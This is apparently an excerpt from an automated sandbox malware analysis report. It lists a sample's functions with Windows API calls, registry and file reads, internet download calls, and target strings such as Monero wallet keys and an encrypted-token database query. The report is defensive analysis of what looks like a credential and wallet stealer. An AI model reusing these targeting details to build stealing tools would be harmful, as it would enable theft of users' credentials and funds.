                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: d00d2eea2f953230f0b6210072e04ba10b9402bc569b87082a27048c31918f8d
                          • Instruction ID: 54a4bff400b9258f99d4ebd6ae03990c1500969d7c2778ceb082ca4851cb94dc
                          • Opcode Fuzzy Hash: d00d2eea2f953230f0b6210072e04ba10b9402bc569b87082a27048c31918f8d
                          • Instruction Fuzzy Hash: 8E514DB1940218ABDB24DFA0DC45BEE77B8EF44701F108098F605B71C1DBB4AA99CF95
                          Function 0012BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0012BC9F
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0012BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0012BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0012BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 2dcc440c61a4bb27a00edd5820193b8bdfbdd964a21bfdbc530bad3a55f20226
                          • Instruction ID: 84e16a3618aed68c7a601c4d5dd5e706be810151f16df6711fab3cfaef9c5dcd
                          • Opcode Fuzzy Hash: 2dcc440c61a4bb27a00edd5820193b8bdfbdd964a21bfdbc530bad3a55f20226
                          • Instruction Fuzzy Hash: C1B13E72910118ABDB04FBA0DD96EEE733CAF64301F804568F546B7191EF746E49CBA2
                          Function 00136770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: ca52858c05704047abe13c91626df3c99c597db6d4f2875e06a77bf29464feb7
                          • Instruction ID: 8090f60c3b387ddaeaa0c0f383d498de0b3a28169c7f486ec9991c1b3adb438f
                          • Opcode Fuzzy Hash: ca52858c05704047abe13c91626df3c99c597db6d4f2875e06a77bf29464feb7
                          • Instruction Fuzzy Hash: 7DF08231904209EFD3459FE0E90972C7BB8FB04703F148198F619A6290D6B04B41DF96
                          Function 00124FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00124FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00124FD1
                          • InternetOpenA.WININET(00140DDF,00000000,00000000,00000000,00000000), ref: 00124FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00125011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00125041
                          • InternetCloseHandle.WININET(?), ref: 001250B9
                          • InternetCloseHandle.WININET(?), ref: 001250C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 53ca3b19ee31fd05bdffaaa32edee27e74da9e7432ae533359f5a589560f10ea
                          • Instruction ID: c8f83d3a554990b79d2f8f54a298d04655a8c656d9576ee80cbb8009cbd5b76f
                          • Opcode Fuzzy Hash: 53ca3b19ee31fd05bdffaaa32edee27e74da9e7432ae533359f5a589560f10ea
                          • Instruction Fuzzy Hash: 583107B4A00218ABDB24CF94DC85BDCB7B9EB48704F5081D8F609B7281C7B06A858F99
                          Function 00138100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F0F278,00000000,?,00140E2C,00000000,?,00000000), ref: 00138130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00138137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00138158
                          • wsprintfA.USER32 ref: 001381AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2922868504-3474575989
                          • Opcode ID: be3c4b87eb589ff50f2c51f150cf2cf0684dc1558ee73d3d82a3609b9082842e
                          • Instruction ID: 760948895650a3cd77de581ebe2cf80b7a52a43007d210e62e629847e011843e
                          • Opcode Fuzzy Hash: be3c4b87eb589ff50f2c51f150cf2cf0684dc1558ee73d3d82a3609b9082842e
                          • Instruction Fuzzy Hash: 5D211AB1E44318ABDB04DFD4DD49FAEBBB8FB44B10F104609F605BB280D7B869018BA5
                          Function 001383DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00138426
                          • wsprintfA.USER32 ref: 00138459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0013847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0013848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00138499
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,00F0F1D0,00000000,000F003F,?,00000400), ref: 001384EC
                          • lstrlen.KERNEL32(?), ref: 00138501
                          • RegQueryValueExA.ADVAPI32(00000000,00F0F290,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00140B34), ref: 00138599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00138608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0013861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: f99c702c614473a6c1741b927dd5ca0295c684f01d373bd75c3e846b2ae4d5fb
                          • Instruction ID: fd70808b32395fc0dee0e5325ef7836e19109563736261d4b2fda8bd59295c19
                          • Opcode Fuzzy Hash: f99c702c614473a6c1741b927dd5ca0295c684f01d373bd75c3e846b2ae4d5fb
                          • Instruction Fuzzy Hash: D821E9B1910218ABDB24DF54DC85FE9B7B8FB48700F00C5D8E649A6140DF71AA85CFE4
                          Function 00137690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001376A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001376AB
                          • RegOpenKeyExA.ADVAPI32(80000002,00EFC250,00000000,00020119,00000000), ref: 001376DD
                          • RegQueryValueExA.ADVAPI32(00000000,00F0F0B0,00000000,00000000,?,000000FF), ref: 001376FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00137708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 01adaf3919e1b81a3fcd141288ceb3ca68fa61447f3df1f4706e4c9e69250666
                          • Instruction ID: 4ed6941b9f1c03d546c7083603ab92bbede42ccfada393cf6c7deb73b8ca8e3d
                          • Opcode Fuzzy Hash: 01adaf3919e1b81a3fcd141288ceb3ca68fa61447f3df1f4706e4c9e69250666
                          • Instruction Fuzzy Hash: BB014FB5A04608BBEB11DBE5DD49F69B7BCEB48701F108054FA05A7291E7B099008F51
                          Function 00137720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0013773B
                          • RegOpenKeyExA.ADVAPI32(80000002,00EFC250,00000000,00020119,001376B9), ref: 0013775B
                          • RegQueryValueExA.ADVAPI32(001376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0013777A
                          • RegCloseKey.ADVAPI32(001376B9), ref: 00137784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 4ac5cbbedc571748fccc4f2a29d90af88aaafc2939a027195814fffe419386f0
                          • Instruction ID: 2d9730a7a871e695f1c262115edc03eb17d7838db78167c8e40e6e88b19a62ab
                          • Opcode Fuzzy Hash: 4ac5cbbedc571748fccc4f2a29d90af88aaafc2939a027195814fffe419386f0
                          • Instruction Fuzzy Hash: A801F4B5A40308BBD711DBE4DC4AFAEBBBCEB48705F108555FA05B7291D7B065408F51
                          Function 001340B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 001340D5
                          • RegOpenKeyExA.ADVAPI32(80000001,00F0E350,00000000,00020119,?), ref: 001340F4
                          • RegQueryValueExA.ADVAPI32(?,00F0F398,00000000,00000000,00000000,000000FF), ref: 00134118
                          • RegCloseKey.ADVAPI32(?), ref: 00134122
                          • lstrcat.KERNEL32(?,00000000), ref: 00134147
                          • lstrcat.KERNEL32(?,00F0F3C8), ref: 0013415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: b8bbf99eab979d9172ff5bad2068fc39c463c9a404eb373e6d806fbbcb1d55f4
                          • Instruction ID: a42351f87a61d13a71280eb247f90dad9b58a9400c88c8c390f6a12d059aa8fd
                          • Opcode Fuzzy Hash: b8bbf99eab979d9172ff5bad2068fc39c463c9a404eb373e6d806fbbcb1d55f4
                          • Instruction Fuzzy Hash: 3241A7B6D001086BDB15EBA0EC46FFE737DAB99300F008558F61557181EBB59B888FE2
                          Function 001299C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                          • LocalFree.KERNEL32(0012148F), ref: 00129A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: c7586ac09c937510c739b5a1d37915c7ca830dbf773f2105ab42149659765ac1
                          • Instruction ID: 5c9717a882a74b80e148968242c563151e1ad5b1b6e97abd04f70adac528f5df
                          • Opcode Fuzzy Hash: c7586ac09c937510c739b5a1d37915c7ca830dbf773f2105ab42149659765ac1
                          • Instruction Fuzzy Hash: E0311AB4A00309EFDB14CF98D985BEE77B9FF48340F108158E912A7290D778AA51CFA1
                          Function 0013C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 4c5ffac09d6fd3a4bd475345e00912c61472599afd97f77ef8940a8a77965bbb
